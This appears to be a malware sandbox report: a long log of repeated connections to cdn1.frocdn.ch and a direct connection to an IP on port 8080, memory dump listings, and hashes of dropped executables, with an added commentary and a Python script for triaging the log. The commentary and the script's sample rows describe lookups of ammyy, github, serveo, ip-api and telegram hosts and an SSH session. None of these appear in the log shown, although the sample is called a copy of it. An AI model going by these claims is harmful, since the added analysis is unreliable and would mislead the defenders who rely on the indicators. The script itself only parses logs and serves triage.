NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 213.232.255.61:8080 213.232.255.61 tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 61.255.232.213.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
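
The rows above are one line per DNS query or connection, in the order the sandbox observed them: the same destination (cdn1.frocdn.ch on 204.10.194.180:443) is contacted hundreds of times, while the lookups against 8.8.8.8:53 are a mix of forward queries (www.ammyy.com, github.com, serveo.net, ip-api.com, api.telegram.org) and reverse PTR queries (`*.in-addr.arpa`) that, in most cases, name an IP contacted a few rows earlier. The Python below is an added example and not part of the sandbox report: it parses rows in this format, separates forward lookups, reverse lookups and real connections, counts contacts per destination, and flags the two things a triage analyst wants pulled out of a list this long, namely connections that went straight to an IP literal with no preceding lookup (213.232.255.61:8080) and connections on ports other than 53/80/443 (the SSH session to serveo.net on port 22). The embedded rows are a constructed subset copied from the table; the function names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: a subset of rows copied from this report's network table,
# kept in their original order. Columns: country, ip:port, queried/contacted host, protocol.
SAMPLE_ROWS = """\
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 140.82.114.3:443 github.com tcp
US 8.8.8.8:53 serveo.net udp
DE 138.68.79.95:22 serveo.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 213.232.255.61:8080 213.232.255.61 tcp
US 8.8.8.8:53 61.255.232.213.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
"""

ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) "
    r"(?P<host>\S+) (?P<proto>tcp|udp)$"
)


@dataclass(frozen=True)
class Row:
    cc: str
    ip: str
    port: int
    host: str
    proto: str


def parse_rows(text: str) -> List[Row]:
    """One row per line; lines that do not match the sandbox format are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Row(m["cc"], m["ip"], int(m["port"]), m["host"], m["proto"]))
    return rows


def ptr_to_ip(name: str) -> str:
    """'118.18.243.136.in-addr.arpa' -> '136.243.18.118' (PTR names list the octets reversed)."""
    labels = name[: -len(".in-addr.arpa")].split(".")
    return ".".join(reversed(labels))


def summarize(rows: List[Row]) -> dict:
    """Split rows into forward DNS queries, reverse (PTR) lookups and real connections."""
    dns_queries: Counter = Counter()      # hostname -> number of forward lookups
    reverse_lookups = set()               # IPs that were resolved back to a name
    connections: Counter = Counter()      # (host, ip, port, proto) -> number of contacts
    for r in rows:
        if r.port == 53 and r.proto == "udp":
            if r.host.endswith(".in-addr.arpa"):
                reverse_lookups.add(ptr_to_ip(r.host))
            else:
                dns_queries[r.host] += 1
        else:
            connections[(r.host, r.ip, r.port, r.proto)] += 1
    return {"dns_queries": dns_queries,
            "reverse_lookups": reverse_lookups,
            "connections": connections}


def top_destinations(rows: List[Row], n: int = 3) -> List[Tuple[str, int]]:
    """Most frequently contacted (host, count) pairs; a long-lived C2 channel dominates this list."""
    conns = summarize(rows)["connections"]
    return [(host, count) for (host, _ip, _port, _proto), count in conns.most_common(n)]


def direct_to_ip(rows: List[Row]) -> List[Tuple[str, int]]:
    """Connections whose host column is just the IP literal: no DNS lookup preceded them."""
    return sorted({(r.ip, r.port) for r in rows if r.host == r.ip})


def non_web_ports(rows: List[Row]) -> List[Tuple[str, str, int]]:
    """Connections on ports other than DNS/HTTP/HTTPS, e.g. the SSH session to serveo.net."""
    return sorted({(r.host, r.ip, r.port) for r in rows if r.port not in (53, 80, 443)})


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    s = summarize(rows)
    print("forward lookups :", dict(s["dns_queries"]))
    print("reverse lookups :", sorted(s["reverse_lookups"]))
    print("top destinations:", top_destinations(rows))
    print("direct-to-IP    :", direct_to_ip(rows))
    print("non-web ports   :", non_web_ports(rows))
```

Run against the full table, `top_destinations` collapses the hundreds of cdn1.frocdn.ch rows into a single count, which is the number a detection engineer needs for a beaconing rule; `direct_to_ip` and `non_web_ports` are the two lists worth blocking or hunting for first, because neither a hard-coded IP on 8080 nor an outbound SSH session to a tunnelling service has a benign explanation on a workstation.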

Files

memory/1592-0-0x0000000000C50000-0x0000000000E36000-memory.dmp

memory/1592-1-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/1592-2-0x0000000005900000-0x0000000005978000-memory.dmp

memory/1592-3-0x0000000005A50000-0x0000000005A60000-memory.dmp

memory/1592-4-0x0000000005980000-0x00000000059E8000-memory.dmp

memory/1592-5-0x00000000059F0000-0x0000000005A3C000-memory.dmp

memory/1592-6-0x0000000006040000-0x00000000065E4000-memory.dmp

memory/444-7-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-10-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-11-0x0000000000400000-0x0000000000473000-memory.dmp

memory/1592-12-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/444-13-0x0000000001060000-0x0000000001067000-memory.dmp

memory/444-14-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-16-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-15-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-17-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/3896-18-0x000001BE533F0000-0x000001BE533F3000-memory.dmp

memory/444-19-0x0000000003B40000-0x0000000003B76000-memory.dmp

memory/444-23-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-26-0x0000000003B40000-0x0000000003B76000-memory.dmp

memory/444-27-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/444-28-0x0000000000400000-0x0000000000473000-memory.dmp

memory/444-29-0x0000000002CF0000-0x00000000030F0000-memory.dmp

memory/3896-30-0x000001BE533F0000-0x000001BE533F3000-memory.dmp

memory/3896-31-0x000001BE53590000-0x000001BE53597000-memory.dmp

memory/3896-32-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-33-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-34-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-35-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-36-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-38-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-40-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-41-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-42-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-43-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/3896-44-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-45-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-46-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-47-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

memory/3896-48-0x00007FF4C8C00000-0x00007FF4C8D2F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
